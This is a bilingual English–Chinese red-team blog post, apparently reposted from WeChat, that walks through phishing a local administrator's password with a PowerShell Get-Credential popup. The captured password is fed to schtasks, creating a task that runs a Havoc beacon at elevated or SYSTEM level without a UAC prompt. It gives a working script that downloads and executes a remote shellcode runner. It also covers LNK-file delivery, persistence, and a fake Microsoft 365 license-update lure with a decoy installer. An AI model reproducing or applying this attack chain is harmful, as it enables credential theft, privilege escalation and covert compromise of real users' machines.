红队针对特权的本地管理员网络钓鱼

To my knowledge, the vast majority of UAC bypasses out there will not get around that prompt when always-notify is set.

据我所知，当设置了always-notify时，绝大多数UAC旁路都无法绕过该提示。

Having this setting in place isn’t fool proof though. An attacker can just keep spamming the user until they click “Yes” on the prompt.

不过，设置此设置并不是万无一失的。攻击者可以继续向用户发送垃圾邮件，直到他们在提示中单击“是”。

Is this a bypass? No, it’s not. I guess I would categorize that under some kind of “user susceptible to alert fatigue” category or something like that.

这是旁路吗？不，不是。我想我会将其归类为某种“易受警报疲劳影响的用户”类别或类似类别。

I’m not trying to start a debate on bypasses and what they are or are not. That wasn’t a bypass. And what I’m writing about today isn’t a bypass either because it’s going to require user interaction, specifically a local administrator.

我不是要开始一场关于旁路以及它们是什么或不是什么的辩论。那不是旁路。我今天要写的内容也不是绕过，因为它需要用户交互，特别是本地管理员。

What we are going to do is phish the local admin for their credentials, store them in PowerShell and then relay those credentials to run a scheduled task that calls our beacon in higher integrity. 

我们要做的是向本地管理员发送其凭据，将其存储在 PowerShell 中，然后中继这些凭据以运行计划任务，该任务以更高的完整性调用我们的信标。

We set up UAC to always notify, we set up real-time and cloud protection, and we have a very convincing EXE called APCTest.exe

我们将 UAC 设置为始终通知，我们设置了实时和云保护，并且我们有一个非常令人信服的 EXE，称为 APCTest.exe

When we execute APCTest.exe, we get a callback too Havoc.

当我们执行APCTest.exe时，我们也会收到一个回调 Havoc。

And here is our PowerShell script.

下面是我们的 PowerShell 脚本。

It’s actually quite simple. We use $credential = Get-Credential to prompt the user (in this case, the local admin) for their username and password. That username and password is then passed to schtasks to schedule a task that executes our APCTest.exe executable at a specified time.

其实很简单。我们使用 $credential = Get-Credential 提示用户（在本例中为本地管理员）输入其用户名和密码。然后，该用户名和密码将传递给 schtasks，以计划在指定时间执行我们的APCTest.exe可执行文件的任务。

What is interesting is that when the task is scheduled, it seems to be scheduled as an administrative task, even though “Run with highest privileges” isn’t checked.

有趣的是，当任务被安排时，它似乎被安排为管理任务，即使没有选中“以最高权限运行”。

We can simply run this script using invoke-expression since Havoc doesn’t have a PowerShell-Import function. I host the script and IEX it through Havoc.

我们可以简单地使用 invoke-expression 运行此脚本，因为 Havoc 没有 PowerShell-Import 函数。我托管脚本并通过 Havoc 对其进行 IEX。

The script, called from my python server, asks for a Windows PowerShell account password in a pop-up window, and once we do, we get a message on Havoc saying our task is scheduled.

该脚本是从我的 python 服务器调用的，在弹出窗口中要求提供 Windows PowerShell 账号密码，一旦我们这样做了，我们就会在 Havoc 上收到一条消息，说我们的任务已经安排好了。

Back to the system found the planned task, here we manually to trigger it.

回到系统发现有计划任务，这里我们手动去触发一下。

The task is running and there was no UAC prompt. 

任务正在运行，并且没有 UAC 提示

If you noticed in the script, we have a line commented out where the task will run as system.

如果您在脚本中注意到，我们注释了一行，任务将作为系统运行。

Once you have an admin you don’t need the user to enter creds to get system. You can simply schedule the task and you will get a system level beacon back.

一旦你有了管理员，你就不需要用户输入信任来获取系统。您可以简单地安排任务，您将获得一个系统级信标.

So this is what our script would look like. As you can see, our taskname has changed to GetSystem. Let’s run it on our admin level beacon.

这就是我们的脚本的样子。如您所见，我们的任务名称已更改为 GetSystem。让我们在管理员级别的信标上运行它。

The output is a bit clunky, but we've got the task scheduled! Let's take a look at it in the Windows Planning task, which will run as system permissions.

输出有点笨拙，但我们已经安排了任务！让我们在 Windows 计划任务里面看一下它，他将作为系统权限运行

Once operational, we recovered the system-level beacon.

运行后，我们就找回了系统级信标

The most important thing here is that we did not receive a UAC prompt. Why? I’m not sure. I’m guessing that when the local admin enters their credentials into the PowerShell popup, it elevates the level of the task to an administrative state.

这里最重要的是我们没有收到 UAC 提示。为什么？我不确定。我猜当本地管理员在 PowerShell 弹出窗口中输入他们的凭据时，它会将任务级别提升为管理状态。

If I open a PowerShell session in medium integrity and run the same command, the task gets scheduled.

如果我在中等完整性中打开 PowerShell 会话并运行相同的命令，则会计划该任务。

But when I run the task I only receive a medium integrity beacon.

但是当我运行任务时，我只收到一个中等完整性的信标。

The persistence piece to this is very easy to extract. Simply modifying the script to run once or twice a day or at logon would suffice.

这其中的持久性非常容易提取。只需将脚本修改为每天运行一到两次或登录时运行即可。

The real question comes to whether or not this is actually practical. Going from a perspective of initial access, what if we ran this from a LNK file? I mean, it is a PowerShell script so calling it would be very easy from a LNK file. We would also need to either drop the corresponding EXE to disc or rewrite the task to invoke a PowerShell oneliner.

真正的问题在于这是否真的可行，从初始访问的角度来看，如果我们从 LNK 文件运行它呢？我的意思是，它是一个 PowerShell 脚本，因此从 LNK 文件调用它非常容易。我们还需要将相应的 EXE 拖放到光盘或重写任务以调用 PowerShell oneliner。

I’ve rewritten the script to use a PowerShell shellcode runner so I don’t have to drop any EXEs to disk.

我重写了脚本以使用 PowerShell shellcode 运行器，因此我不必将任何 EXE 拖放到磁盘。

Here is the new script:

下面是新脚本：

# Prompt the user for credentials
$credential = Get-Credential

# Define the PowerShell command
$powerShellCommand = “-exec bypass iex (New-Object System.Net.WebClient).DownloadString(‘’http://192.168.1.29:9090/runner.md'')"

# Extract the username and password from the credential
$username = $credential.UserName
$password = $credential.GetNetworkCredential().Password

# Define the command to create the scheduled task using schtasks.exe
$powerShellCommandEscaped = $powerShellCommand -replace “‘“, “‘’” # Escape single quotes
$command = “schtasks /create /tn GetAdmin /tr `”powershell.exe $powerShellCommandEscaped`” /sc once /st 15:00 /ru $username /rp $password”

# Execute the command using Invoke-Expression
Invoke-Expression -Command $command

The runner.md call in the command is just a PowerShell shellcode runner from my repo here:

命令中的 runner.md 调用只是我的存储库中的 PowerShell shellcode 运行器

Now that we have the script in place, we need a way to call it. That same repo has a LNK builder script that we can use.

现在我们已经有了脚本，我们需要一种方法来调用它。同一个存储库有一个我们可以使用的 LNK 构建器脚本。

We run the LNK file and our Popup appears.

我们运行 LNK 文件，并出现弹出窗口。

On my web server I see that the GetBeaconTaskScript.ps1 file was invoked.

在我的 Web 服务器上，我看到调用了 GetBeaconTaskScript.ps1 文件。

I enter the credentials.

我输入凭据。

The background PowerShell window exits. Did our scheduled task get created?

后台 PowerShell 窗口将退出。我们的计划任务是否已创建？

It did. Now instead of waiting for it hit at 3PM, let’s trigger it. We see that my runner.md shellcode runner was called, then the shelly.md file which houses my shellcode (this shellcode runner is staged).

它做到了。现在，与其等待它在下午 3 点命中，不如让我们触发它。我们看到我的 runner.md shellcode 运行程序被调用，然后是保存我的 shellcode 的 shelly.md 文件（这个 shellcode 运行程序是暂存的）。

Success! And all without a UAC prompt. 

成功！而且所有这些都没有 UAC 提示

The real question is what would a real world style phishing campaign look like with this type of attack? We’ve focused on the privilege escalation aspect, but what would this do if a regular user tried it?

真正的问题是，在这种类型的攻击下，现实世界风格的网络钓鱼活动会是什么样子？我们专注于权限提升方面，但如果普通用户尝试一下，这会做什么？

Standard users aren’t going to have access to Log on as batch job rights unless they have been granted this in a GPO or local security policy. Bummer, so this will have to be a targeted attack for admins.

除非在 GPO 或本地安全策略中授予标准用户，否则他们无权访问“作为批处理作业登录”权限。太可惜了，所以这必须是针对管理员的有针对性的攻击。

The task did get built, it just won’t run. But, a lot businesses make their remote workers local admins of their computers so who knows, you might get lucky.

任务确实构建好了，只是无法运行。但是，许多企业让他们的远程工作者成为他们计算机的本地管理员，所以谁知道呢，你可能会很幸运。

Obviously we could just run our script with Havoc using the PowerShell command once we have a regular beacon, but if we wanted to use this as an initial access vector, we could go with a very common phish, the MSP update scam.

显然，一旦我们有了常规信标，我们就可以使用 PowerShell 命令使用 Havoc 运行我们的脚本，但是如果我们想将其用作初始访问向量，我们可以使用非常常见的网络钓鱼，即 MSP 更新骗局。

Our pretext is one of my favorites. Your M365 license needs to be updated on your machine. Let’s start out by augmenting our LNK file. I chose the icon for the cliconfg.exe application in system32.

我们的借口是我的最爱之一。您的 M365 许可证需要在您的计算机上更新。让我们从扩充 LNK 文件开始。我在 system32 中选择了cliconfg.exe应用程序的图标。

Here’s my updated script.

这是我更新的脚本。

But we need to augment this for a more tailored experience. I have the OfficeSetup.exe executable that pretty much does nothing if Office is already installed on a system.

但我们需要增强这一点，以获得更量身定制的体验。我有OfficeSetup.exe可执行文件，如果系统上已经安装了 Office，它几乎什么都不做。

I’ll move this into my web server directory and then call it at the end of my scheduled task script.

我会将其移动到我的 Web 服务器目录中，然后在计划的任务脚本末尾调用它。

The complete process is for the administrator to click on the LNK file, display an authentication pop-up, authenticate, and then the OfficeSetup.exe binary takes a long time to download before executing. We then manually trigger the scheduled task and receive a raised beacon.

完整流程是管理员单击 LNK 文件，显示一个身份验证弹出窗口，进行身份验证，然后OfficeSetup.exe二进制文件在执行之前需要很长时间才能下载。然后，我们手动触发计划任务并接收一个提升的信标。

Is this dumb? I don’t know. Probably. Would it work? In the right context, yeah. I mean admins still click on $5 Starbucks Gift Card scams. Would it be a go-to TTP? I hope not. But it’s interesting that this does get around UAC, even if the box is set to always-notify.

这是愚蠢的吗？我不知道。可能。它会起作用吗？在正确的背景下，是的。我的意思是管理员仍然点击 5 美元的星巴克礼品卡骗局。它会是首选的 TTP 吗？我希望不是。但有趣的是，这确实绕过了 UAC，即使该框设置为始终通知。

"对红队攻防感兴趣吗？想要深入学习相关知识？欢迎加入我们的知识星球！在这里，我们会不定期分享最新的学习资料，技术讨论，快快扫描下方二维码，加入我们的社群吧！

除了学习资料分享，我们提供网安证书报考特惠渠道以及最新的免杀课程！详细信息，请扫描下方二维码进行咨询。

证书报考咨询：

免杀课程咨询：

原文始发于微信公众号（赛博社工）：红队针对特权的本地管理员网络钓鱼